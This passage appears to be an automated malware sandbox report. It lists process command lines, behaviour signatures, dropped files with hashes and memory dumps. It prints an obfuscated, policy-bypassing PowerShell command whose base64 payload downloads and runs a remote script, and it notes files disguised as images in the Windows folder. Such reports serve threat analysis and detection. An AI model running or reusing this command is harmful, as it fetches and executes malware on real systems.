    Command line: cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
    Signatures: Suspicious use of WriteProcessMemory
    - [depth 3] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Command line: powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
      Signatures: Blacklisted process makes network request; Drops file in Program Files directory; Drops file in Windows directory; Modifies data under HKEY_USERS; Suspicious behavior: EnumeratesProcesses
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads
- C:\Users\Admin\AppData\Local\Temp\RES7B02.tmp
  MD5: d5e28cdeeb350007824b8d16b12281c1
  SHA1: 5eab46d0981e7a1305c35909b3fc12175d3619cb
  SHA256: bf971519c14ff68446285494ee7da17cda21ade9eb681d30623c3d7e0965f028
  SHA512: 1c5f9fd93b80183b56e72a3cf89b3b2e68e4a4d9503d0a2c32b70d6dd9bd832b7a3e37d9cf6cb14c1f3be7f4fd9be19d972461ab9d98258514325c9c22809ba4
- C:\Users\Admin\AppData\Local\Temp\bsk1nuli\bsk1nuli.dll
  MD5: 6318c3b9a1de7294e015e0f43d83c7f7
  SHA1: 026f671c2f186a6b3d299e999c5d9392cbb2232b
  SHA256: f383aed2827d38d8183e857162fe3d92e5ded4139ce5873da76e3208481221ca
  SHA512: fdf2b139e70083dc9687f6473857aa58a1ba487734ee7d0a16d9facd8d97d1cf9827640237e03262699274a798278231759b7bce9c356521ad314188a53f8af0
- C:\Users\Admin\AppData\Local\Temp\get-points.ps1
  MD5: dac6b25db50155c0c78d5bf64fb95fa3
  SHA1: 9e49c8f7a6df94acdefd0daa4c330f92f6d01d0d
  SHA256: 6967c2ea21792d390309dfd66d56b19f89d89ba4a6fb8f39f10a8212d5e70eaf
  SHA512: 679b3706f2c03898afb4250b1f51d5e0e7187ed923f7d7cc3a06c5f9a1e5b18bbbc46e9c2c9abd0b4b42e5e3a5b2dd668e3057063562b874119c42e855292868
- C:\Users\Admin\AppData\Local\Temp\get-points.zip
  MD5: 7cac19b2868c41555db4b71219217f9b
  SHA1: d6f77db578db3c5c572c3a944d9072ed00560dcb
  SHA256: d8f648e2952466c25343b095ed14591b25b29d0d1c391ca019a8d8f0a39b934a
  SHA512: 5bafea5eed1ba0493188bb79eafda47a141281fb3258be0dfe08b6b78e5dcf731fd2142b94f95b3203fa6daad27fff1f4495ac7bdebe6eb8a9cbe31b16bfc7b6
- \??\PIPE\lsarpc
  MD5: d41d8cd98f00b204e9800998ecf8427e
  SHA1: da39a3ee5e6b4b0d3255bfef95601890afd80709
  SHA256: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
  SHA512: cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
- \??\c:\Users\Admin\AppData\Local\Temp\bsk1nuli\CSC5AFA9353C6024F6DB26019D1805C12.TMP
  MD5: 0e951b25d6d3e6fcd0146ee211d6bca8
  SHA1: 0a337bcf83e5311229acd85004d713065dff5ba2
  SHA256: d68214026c8edd7a377c10933f24b8dea5ae60f2d008cd8c642f7a089808d06a
  SHA512: 25da5a631c507e44d40a2fba7a0baf3508d64f92f5e4368f5d0110355d89e4d84234e1cd1ab3f5ea4cbea3581f2306fe970f4762f660eb3024a3698f71a37514
- \??\c:\Users\Admin\AppData\Local\Temp\bsk1nuli\bsk1nuli.0.cs
  MD5: 6f235215132cdebacd0f793fe970d0e3
  SHA1: 2841e44c387ed3b6f293611992f1508fe9b55b89
  SHA256: ccad602538354ee5bbc78ab935207c36ba9910da1a7b5a10ff455e34e15f15ec
  SHA512: a14657bc5be862a96c1826347b551e07b47ffa6ffd7e12fbfc3437b9a48e8b8e020ae71b8ef836c357d9db6c065da962a6141272d9bc58b76a9eb9c11553d44e
- \??\c:\Users\Admin\AppData\Local\Temp\bsk1nuli\bsk1nuli.cmdline
  MD5: f11567b52f2859819d6f24d024c44cb7
  SHA1: 0e898a841c63cb114a4471a4851b2cbeef26e2ee
  SHA256: 733e388109670a26260067308a1a00a73834d6791f31d978bc2d887496bc06ab
  SHA512: fb665988c38dcdd842cb7a406e2642a133ff661c11199928d79086cfaa5a39c24ba16a84d063f51ba9eb73f3dccca05b8c19b64044bd910688677b3b992adc05
- \Windows\Branding\mediasrv.png
  MD5: eeb448ea2709c57b9ea2e223d0c79396
  SHA1: 38331dd027386151ee37a29a7820570a76427b02
  SHA256: c82a8ca8997348bc1631637799d8c88e33df3b64d23fdb006a1afdb5e0170272
  SHA512: c133096ce90e5693669c056a31870b982b162196508babae4d1d9eb4055f2096af9460164d68885693af56389a42977f4193906da1d19f457e26187a46a5e3fc
- \Windows\Branding\mediasvc.png
  MD5: bb873bd05a47f502ee4ed3c4ea749a4f
  SHA1: e55a6bf49a4833fb9e9b123df39dac9bf507f75a
  SHA256: a6a28143f81b007c6853cc80829c16d2aadbe427abe1408276b558f34904900a
  SHA512: ce2a22e5e78d3f01a6880a48153f6d3ba8ff025d7bbfe8949b7742a5b7ffa9e44484027353bb80b70e8cad8181dc26b6aabe637b5f7fd2aa4a99cd880d758548
- memory/396-45-0x0000000000000000-mapping.dmp
- memory/416-51-0x0000000000000000-mapping.dmp
- memory/508-7-0x0000000000000000-mapping.dmp
- memory/648-47-0x00007FF93EFE0000-0x00007FF93F9CC000-memory.dmp (Filesize: 9.9MB)
- memory/648-46-0x0000000000000000-mapping.dmp
- memory/908-10-0x0000000000000000-mapping.dmp
- memory/932-17-0x0000000000000000-mapping.dmp
- memory/960-52-0x0000000000000000-mapping.dmp
- memory/1844-15-0x0000000000000000-mapping.dmp
- memory/2000-16-0x0000000000000000-mapping.dmp
- memory/2044-41-0x0000000000000000-mapping.dmp
- memory/2268-18-0x0000000000000000-mapping.dmp
- memory/2328-39-0x0000000000000000-mapping.dmp
- memory/2376-19-0x0000000000000000-mapping.dmp
- memory/2440-20-0x0000000000000000-mapping.dmp
- memory/2728-21-0x0000000000000000-mapping.dmp
- memory/2892-22-0x0000000000000000-mapping.dmp
- memory/3036-26-0x0000000000000000-mapping.dmp
- memory/3332-24-0x0000000000000000-mapping.dmp
- memory/3516-27-0x0000000000000000-mapping.dmp
- memory/3824-32-0x0000000000000000-mapping.dmp
- memory/3928-43-0x0000000000000000-mapping.dmp
- memory/3984-33-0x0000000000000000-mapping.dmp
- memory/4032-38-0x0000000000000000-mapping.dmp
- memory/4300-44-0x0000000000000000-mapping.dmp
- memory/4316-2-0x0000000000000000-mapping.dmp
- memory/4316-3-0x00007FF93EFE0000-0x00007FF93F9CC000-memory.dmp (Filesize: 9.9MB)
- memory/4316-4-0x00000195F4D70000-0x00000195F4D71000-memory.dmp (Filesize: 4KB)
- memory/4316-5-0x00000195F4F20000-0x00000195F4F21000-memory.dmp (Filesize: 4KB)
- memory/4316-14-0x00000195F4EB0000-0x00000195F4EB1000-memory.dmp (Filesize: 4KB)
- memory/4372-23-0x0000000000000000-mapping.dmp
- memory/4464-25-0x0000000000000000-mapping.dmp
- memory/4468-36-0x0000000000000000-mapping.dmp
- memory/4472-37-0x0000000000000000-mapping.dmp
- memory/4484-30-0x0000000000000000-mapping.dmp
- memory/4624-31-0x0000000000000000-mapping.dmp
- memory/4700-40-0x0000000000000000-mapping.dmp
- memory/4720-35-0x0000000000000000-mapping.dmp
- memory/4748-34-0x0000000000000000-mapping.dmp
- memory/4760-1-0x0000000001770000-0x0000000001771000-memory.dmp (Filesize: 4KB)